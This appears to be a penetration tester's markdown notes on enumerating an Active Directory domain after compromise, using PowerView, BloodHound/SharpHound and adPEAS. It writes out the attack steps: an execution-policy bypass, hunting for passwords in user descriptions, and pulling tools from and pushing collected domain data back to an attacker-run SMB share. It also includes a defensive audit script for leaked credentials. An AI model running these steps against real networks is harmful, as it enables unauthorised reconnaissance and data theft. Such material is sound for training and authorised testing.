attacking-ad-post-compromise-enumeration.md


Attacking AD: Post-Compromise Enumeration

Introduction

  • Once you have a compromised host or a set of domain credentials, how can you enumerate the domain and increase your overall level of access?

Tools

  • PowerView -- AD Enumeration tool (PowerShell)
  • BloodHound -- Graphical representation of AD environment
  • SharpHound -- BloodHound's collector
  • adPEAS -- Automated, all-in-one AD enumeration script (PowerShell); very thorough.

Make sure that you ALWAYS use fresh, matching versions of BloodHound and SharpHound: the collector's output format has to match the BloodHound release you import it into.

Repos

PowerView:

{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" %}

BloodHound:

{% embed url="https://github.com/BloodHoundAD/BloodHound/releases" %}

SharpHound (Collector):

{% embed url="https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors" %}

adPEAS:

{% embed url="https://github.com/61106960/adPEAS" %}

PowerView

Step 1: Transfer PowerView.ps1 to the target machine

Step 2: Bypass the execution policy -- powershell -ep bypass

Step 3: Dot-source the script -- . .\PowerView.ps1

Step 4: Start running commands!

Step 5: Domain info -- Get-NetDomain

Step 6: Get DC Info -- Get-NetDomainController

Step 7: Show domain policies -- Get-DomainPolicy

Step 8: User Info -- Get-NetUser

or just grab a list of domain users -- Get-NetUser | select samaccountname

Look for passwords left in user description fields -- Get-NetUser | select description

Step 9: Find Shares -- Invoke-ShareFinder

Step 10: Look at Group Policies -- Get-NetGPO | select displayname, whenchanged
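The description check in Step 8 cuts both ways: admins leave service-account passwords in the Description attribute, and anyone who can read the directory can pull them out. The following is an added example, not part of the original notes or of PowerView, written from the defender's side: a heuristic audit that flags descriptions which look like they carry a secret so they can be scrubbed and the account's password rotated. It runs offline against constructed sample objects; the commented Get-ADUser line at the end is how you would feed it a real domain and assumes the RSAT ActiveDirectory module is installed. The regex patterns are assumed heuristics and will produce some false positives (e.g. ticket numbers mixing cases, digits and symbols); treat every hit as something to review, not as a confirmed leak.

```powershell
# Added example (not from the original notes): a defender-side audit for the
# same weakness the PowerView step looks for -- credentials left in AD user
# description fields. Sample data below is constructed; the Get-ADUser line at
# the bottom is how you would feed it real data (assumes RSAT ActiveDirectory).

function Test-SuspiciousDescription {
    <#
      Returns $true when a description field looks like it carries a secret.
      Heuristics (assumed, tune to your environment):
        - password/passwd/pwd/pw/cred(s) followed by a separator ("is", ":", "=", "-") and a value
        - a token of 10+ non-space chars mixing upper, lower, digit and symbol
          (a pasted password; also matches things like ticket IDs -> false positive)
    #>
    param([AllowNull()][string]$Description)

    if ([string]::IsNullOrWhiteSpace($Description)) { return $false }

    $patterns = @(
        '(?i)\b(password|passwd|pwd|pw|cred(ential)?s?)\b\s*(is|[:=\-])\s*\S+',
        '(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)(?=\S*[^\w\s])\S{10,}'
    )
    foreach ($p in $patterns) {
        # -cmatch keeps the match case-sensitive so the upper/lower lookaheads
        # in the second pattern actually mean something ( -match ignores case).
        if ($Description -cmatch $p) { return $true }
    }
    return $false
}

function Find-CredentialDescriptions {
    <#
      Accepts user-like objects exposing SamAccountName and Description
      (the shape Get-ADUser emits) and returns the ones that trip the heuristic.
    #>
    param([Parameter(ValueFromPipeline)][psobject[]]$User)
    process {
        foreach ($u in $User) {
            if (Test-SuspiciousDescription $u.Description) {
                [pscustomobject]@{
                    SamAccountName = $u.SamAccountName
                    Description    = $u.Description
                }
            }
        }
    }
}

# Constructed sample data standing in for Get-ADUser output.
$sampleUsers = @(
    [pscustomobject]@{ SamAccountName = 'svc_backup'; Description = 'Backup service account. Password: Backup2023!' }
    [pscustomobject]@{ SamAccountName = 'jsmith';     Description = 'Finance team, desk 4B' }
    [pscustomobject]@{ SamAccountName = 'hr_temp';    Description = 'temp acct pw=Welcome1' }
    [pscustomobject]@{ SamAccountName = 'printer01';  Description = 'Reset password monthly via helpdesk' }
    [pscustomobject]@{ SamAccountName = 'svc_sql';    Description = 'Initial creds: Sq1Serv3r#2024 (change on first login)' }
)

$hits = $sampleUsers | Find-CredentialDescriptions
$hits | Format-Table -AutoSize
# svc_backup, hr_temp and svc_sql are flagged; jsmith and printer01 are not
# ("Reset password monthly" has no separator after the keyword).

# Against a real domain (requires the RSAT ActiveDirectory module):
# Get-ADUser -Filter * -Properties Description | Find-CredentialDescriptions
```

The Description attribute is readable by every authenticated domain user by default, so the fix for a hit is to clear the field and rotate the account's password, not just to tidy the text.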

Cheat Sheet

{% embed url="https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993" %}

BloodHound

Run Neo4j:

neo4j console

Run BloodHound:

bloodhound
  • Type in username and password

Grab Data w/ Invoke-BloodHound (Collector)

  • You can use the PowerShell version of SharpHound (SharpHound.ps1), which exposes the Invoke-BloodHound function

Transfer SharpHound to your target:

Kali:

impacket-smbserver smb . -smb2support

Windows:

net use \\kali-ip\smb
copy \\kali-ip\smb\SharpHound.ps1

Invoke-BloodHound:

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All
  • It will generate a zip file on the target
  • Copy this zip file back to the SMB share you created, retrieve it on Kali, and drag and drop it into BloodHound

Enumerating Domain Data w/ BloodHound

  • Be sure to load up the pre-built queries and see what we have to do to get to Domain Admin (DA)
  • Be sure to right-click on items for help with exploitation!

Should we look into custom queries?

{% embed url="https://github.com/hausec/Bloodhound-Custom-Queries" %}

Things to keep in mind:

  • Use PowerView to enumerate users, groups, group policies, computers, etc.
  • Use BloodHound to identify administrators, high-value targets, which group memberships grant admin rights, etc.

adPEAS

Step 1: Transfer the script to the Windows target (e.g. via the SMB server set up above)

Step 2: Import and Invoke

Import-Module .\ADPeas.ps1

Invoke-ADPeas

Step 3: Go through the output slowly; it is long and covers many checks